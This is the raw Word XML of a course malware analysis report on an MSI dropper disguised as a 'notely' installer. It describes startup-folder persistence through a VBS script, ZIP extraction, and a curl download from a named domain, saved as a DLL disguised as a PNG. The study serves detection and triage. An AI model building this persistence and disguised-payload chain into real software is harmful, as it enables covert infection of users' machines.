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F3F" w14:textId="4A651FC3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2D067C13" w14:textId="02E462A1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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="740C85BD" wp14:editId="6AEF6B8B">
            <wp:extent cx="3467100" cy="3572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6" cy="35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C4C7" w14:textId="7DFD9679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04829E37" w14:textId="5A9BFCD1" w:rsidR="00635627" w:rsidRP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Practical Malware Analysis &amp; Triage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3EB37F" w14:textId="69710A2E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Malware Analysis Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75D8BB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44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F525F20" w14:textId="017F1592" w:rsidR="00635627" w:rsidRDefault="001B172A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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B172A">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Dropper.installer.msi.malz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FADF9CE" w14:textId="4E735DFE" w:rsidR="00635627" w:rsidRDefault="001B172A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t>Feb</w:t>
      </w:r>
      <w:r w:rsidR="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t xml:space="preserve"> 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t>Amna Jasser</w:t>
      </w:r>
      <w:r w:rsidR="00635627">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="004E76"/>
        </w:rPr>
        <w:t xml:space="preserve"> | v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F51BE" w14:textId="77777777" w:rsidR="00635627" w:rsidRDefault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br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_Toc159205428" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Franklin Gothic Book" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="004E76"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="815929648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2DEFE4F" w14:textId="056EFD4E" w:rsidR="00635627" w:rsidRPr="00635627" w:rsidRDefault="00635627" w:rsidP="00E20896">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r w:rsidRPr="00635627">
            <w:t>Table of Contents</w:t>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w14:paraId="01504A54" w14:textId="7FC79528" w:rsidR="00A515F3" w:rsidRDefault="006356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r w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc159205428" w:history="1">
            <w:r w:rsidR="00A515F3" w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
            </w:r>
            <w:r w:rsidR="00A515F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A515F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00A515F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159205428 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00A515F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00A515F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00A515F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00A515F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00403BE1" w14:textId="3BEC32F5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29" w:history="1">
            <w:r w:rsidRPr="00605191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E588" w14:textId="2F0DD21E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30" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High-Level Technical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59A1" w14:textId="7906CF7F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31" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Malware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1A93" w14:textId="2BB2AA2C" w:rsidR="00A515F3" w:rsidRDefault="00A51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205432" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>srvupdate.exe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763C" w14:textId="0AAFCF20" w:rsidR="00A515F3" w:rsidRDefault="00A51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205433" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unzip.vbs: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A6CD" w14:textId="2193F836" w:rsidR="00A515F3" w:rsidRDefault="00A51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205434" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OneWitch.PNG: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D97E" w14:textId="77F32C48" w:rsidR="00A515F3" w:rsidRDefault="00A51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205435" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Notely.exe: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9A80" w14:textId="04BF51E1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36" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Basic 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17A3" w14:textId="7D3953D4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37" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Basic 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9ADD" w14:textId="36129B71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38" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advanced 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D12D" w14:textId="3CA3482B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39" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advanced 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6A5E" w14:textId="4283344D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40" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Indicators of Compromise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4268" w14:textId="35F49309" w:rsidR="00A515F3" w:rsidRDefault="00A51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205441" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network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7AB3" w14:textId="6B9FD71C" w:rsidR="00A515F3" w:rsidRDefault="00A51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205442" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Host-based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2D07" w14:textId="503C3BCF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43" w:history="1">
            <w:r w:rsidRPr="00605191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules &amp;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0CBB" w14:textId="18E610A7" w:rsidR="00A515F3" w:rsidRDefault="00A515F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59205444" w:history="1">
            <w:r w:rsidRPr="0060519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3BB4" w14:textId="2BF9837D" w:rsidR="00A515F3" w:rsidRDefault="00A515F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205445" w:history="1">
            <w:r w:rsidRPr="0060519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05191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Yara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0CBB" w14:textId="51A256DF" w:rsidR="00A515F3" w:rsidRDefault="00A515F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205446" w:history="1">
            <w:r w:rsidRPr="0060519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05191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Callback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3F71" w14:textId="43C101D3" w:rsidR="00A515F3" w:rsidRDefault="00A515F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205447" w:history="1">
            <w:r w:rsidRPr="0060519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05191">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unzip.vbs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_Toc159205447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38A6" w14:textId="1012C645" w:rsidR="00635627" w:rsidRPr="00635627" w:rsidRDefault="00635627" w:rsidP="00635627">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00635627">
            <w:rPr>
              <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="05415DF5" w14:textId="4EB94B26" w:rsidR="00635627" w:rsidRDefault="00635627">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D48395" w14:textId="6CA9AC3A" w:rsidR="00000000" w:rsidRPr="005F08C6" w:rsidRDefault="00480604" w:rsidP="00E20896">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc159205429"/>
      <w:r w:rsidRPr="005F08C6">
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5BF79D64" w14:textId="455DFA4B" w:rsidR="00480604" w:rsidRDefault="00480604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00A" w:rsidRPr="004E000A" w14:paraId="0E874BAC" w14:textId="42C80309" w:rsidTr="004E000A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1525" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0532F255" w14:textId="0268EB16" w:rsidR="004E000A" w:rsidRPr="004E000A" w:rsidRDefault="004E000A" w:rsidP="0096700A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2748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E000A">
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SHA256 hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E29440B" w14:textId="27BBE74F" w:rsidR="004E000A" w:rsidRPr="004E000A" w:rsidRDefault="00647EB0" w:rsidP="0096700A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2748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647EB0">
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1866b0e00325ee8907052386a9286e6ed81695a2eb35d5be318d71d91fbce2db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4891191B" w14:textId="77777777" w:rsidR="001B172A" w:rsidRDefault="001B172A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78C99DCE" w14:textId="7192FB4D" w:rsidR="00290930" w:rsidRPr="00290930" w:rsidRDefault="00290930" w:rsidP="00290930">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>notely-setup-x64.msi</w:t>
      </w:r>
      <w:r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is an MSI dropper malware sample. It isn't your typical MSI downloader; instead, it drops a DLL using custom actions. The malware comprises a singular payload, which is a DLL. Upon execution, it registers itself to download what appears to be a legitimate program, namely notely.exe. Additional dropped files include VBA scripts with names like unzip.vbs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7DEBF" w14:textId="77777777" w:rsidR="00290930" w:rsidRPr="00290930" w:rsidRDefault="00290930" w:rsidP="00290930">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33777AAB" w14:textId="7223B7BD" w:rsidR="001B172A" w:rsidRDefault="00290930" w:rsidP="00290930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r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Symptoms of infection manifest curl command directed at a local domain, as outlined in Appendix B. The DLL file cleverly disguises itself as a PNG file, tucked away in the directory \Users\howl\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\Roaming\oneWitch.png. This covert maneuver is accomplished through extraction from a ZIP file named Emergreport.zip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847F177" w14:textId="614CBC6B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491BFB6C" w14:textId="77777777" w:rsidR="00647EB0" w:rsidRDefault="00647EB0" w:rsidP="00647EB0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t xml:space="preserve">YARA signature rules are attached in Appendix A. Malware sample and hashes have been submitted to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for further examination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E53168" w14:textId="00B84669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41FB2C05" w14:textId="23BB9883" w:rsidR="005F08C6" w:rsidRDefault="005F08C6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B4F96" w14:textId="56BD9A1A" w:rsidR="005F08C6" w:rsidRPr="00E20896" w:rsidRDefault="005F08C6" w:rsidP="00E20896">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc159205430"/>
      <w:r w:rsidRPr="00E20896">
        <w:lastRenderedPageBreak/>
        <w:t>High-Level Technical Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7B051B6D" w14:textId="56659066" w:rsidR="00E20896" w:rsidRPr="00C424D4" w:rsidRDefault="007F087F" w:rsidP="005F08C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290930">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:eastAsia="Times New Roman" w:hAnsi="Montserrat Medium" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dropper.installer.msi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C424D4">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E32A25" w:rsidRPr="00C424D4">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">consists of two parts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MSI file that supposedly to be a legit one for downloading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>notely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> software but it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a DLL that is then used to download the falsely </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>notely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5A49E" w14:textId="641DFC36" w:rsidR="00E32A25" w:rsidRDefault="00E32A25" w:rsidP="005F08C6"/>
    <w:p w14:paraId="08A4C88A" w14:textId="614C6C56" w:rsidR="00E32A25" w:rsidRDefault="00E32A25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rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium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AB8432C" wp14:editId="0982E1B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6504940" cy="5795010"/>
            <wp:effectExtent l="38100" t="0" r="10160" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="1775"/>
                <wp:lineTo x="-127" y="1917"/>
                <wp:lineTo x="-127" y="5325"/>
                <wp:lineTo x="822" y="5325"/>
                <wp:lineTo x="822" y="18959"/>
                <wp:lineTo x="1708" y="18959"/>
                <wp:lineTo x="1771" y="19811"/>
                <wp:lineTo x="17649" y="19811"/>
                <wp:lineTo x="17712" y="17822"/>
                <wp:lineTo x="18091" y="17822"/>
                <wp:lineTo x="19230" y="16970"/>
                <wp:lineTo x="19293" y="15550"/>
                <wp:lineTo x="20495" y="14485"/>
                <wp:lineTo x="20558" y="13278"/>
                <wp:lineTo x="21570" y="12213"/>
                <wp:lineTo x="21570" y="10509"/>
                <wp:lineTo x="20052" y="10367"/>
                <wp:lineTo x="12968" y="9870"/>
                <wp:lineTo x="13031" y="8734"/>
                <wp:lineTo x="18091" y="7598"/>
                <wp:lineTo x="18218" y="5822"/>
                <wp:lineTo x="17396" y="5680"/>
                <wp:lineTo x="10690" y="5325"/>
                <wp:lineTo x="14359" y="5325"/>
                <wp:lineTo x="15182" y="5112"/>
                <wp:lineTo x="15055" y="3053"/>
                <wp:lineTo x="14929" y="1988"/>
                <wp:lineTo x="14929" y="1775"/>
                <wp:lineTo x="0" y="1775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7D411C62" w14:textId="77777777" w:rsidR="0000714D" w:rsidRDefault="0000714D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71EC1884" w14:textId="0EA55274" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="7935CD8F" w14:textId="77777777" w:rsidR="00050629" w:rsidRDefault="00050629" w:rsidP="009E133A"/>
    <w:p w14:paraId="1C64FDE8" w14:textId="123BB3B8" w:rsidR="006D50F4" w:rsidRDefault="009E133A" w:rsidP="006D50F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When running </w:t>
      </w:r>
      <w:r w:rsidRPr="009E133A">
        <w:t>notely-setup-x64.msi</w:t>
      </w:r>
      <w:r w:rsidR="006D50F4">
        <w:t xml:space="preserve">, it runs a shell script from unzip.vbs and saves it to </w:t>
      </w:r>
      <w:r w:rsidR="006D50F4" w:rsidRPr="006D50F4">
        <w:t>Users\howl\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D50F4" w:rsidRPr="006D50F4">
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D50F4" w:rsidRPr="006D50F4">
        <w:t>\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\</w:t>
      </w:r>
      <w:r w:rsidR="006D50F4">
        <w:t xml:space="preserve"> so that it </w:t>
      </w:r>
      <w:r w:rsidR="006D50F4" w:rsidRPr="006D50F4">
        <w:t>attempts</w:t>
      </w:r>
      <w:r w:rsidR="006D50F4" w:rsidRPr="006D50F4">
        <w:t xml:space="preserve"> to achieve persistence on the system. The  "Startup" folder is a location in Windows where programs or scripts  placed within it will automatically run when the user logs in</w:t>
      </w:r>
      <w:r w:rsidR="006D50F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76360116" w14:textId="6CD4AA5D" w:rsidR="006D50F4" w:rsidRPr="006D50F4" w:rsidRDefault="006D50F4" w:rsidP="006D50F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then the shell code </w:t>
      </w:r>
      <w:r w:rsidR="00BF2764">
        <w:t>seems to be extracting files from a ZIP archive (</w:t>
      </w:r>
      <w:r w:rsidR="00BF2764">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Emergreport.zip</w:t>
      </w:r>
      <w:r w:rsidR="00BF2764">
        <w:t>) and executing a file from within that archive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D611B35" w14:textId="77777777" w:rsidR="00BF2764" w:rsidRPr="00BF2764" w:rsidRDefault="00BF2764" w:rsidP="00BF2764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Having the Zip file in this registry indicated that </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t>the contents of the ZIP file might be used or accessed as shared dynamic-link libraries (DLLs) by various applications on the system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t>it tries to run or maintain its presence on the system over time, potentially during system startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50315D59" w14:textId="25F8172A" w:rsidR="00BF2764" w:rsidRPr="00BF2764" w:rsidRDefault="00BF2764" w:rsidP="00BF2764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2764">
        <w:t xml:space="preserve">Then it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007F67B0" w:rsidRPr="00BF2764">
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF2764">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a curl </w:t>
      </w:r>
      <w:r w:rsidR="007F67B0">
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to save the contents from a domain[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2764">
        <w:t>consumerfinancereport.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2764">
        <w:t>/blog/index/witchABy.jpg</w:t>
      </w:r>
      <w:r>
        <w:t>] to a PNG file [</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2764">
        <w:t>C:\Users\howl\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2764">
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2764">
        <w:t>\Roaming\oneWitch.png</w:t>
      </w:r>
      <w:r>
        <w:t>] which in tern is a DLL file see in Appendix for details</w:t>
      </w:r>
      <w:r w:rsidR="007F67B0">
        <w:t xml:space="preserve">, Although there is no network traffic seen in Wireshark there is a possibility that the traffic was encrypted. </w:t>
      </w:r>
    </w:p>
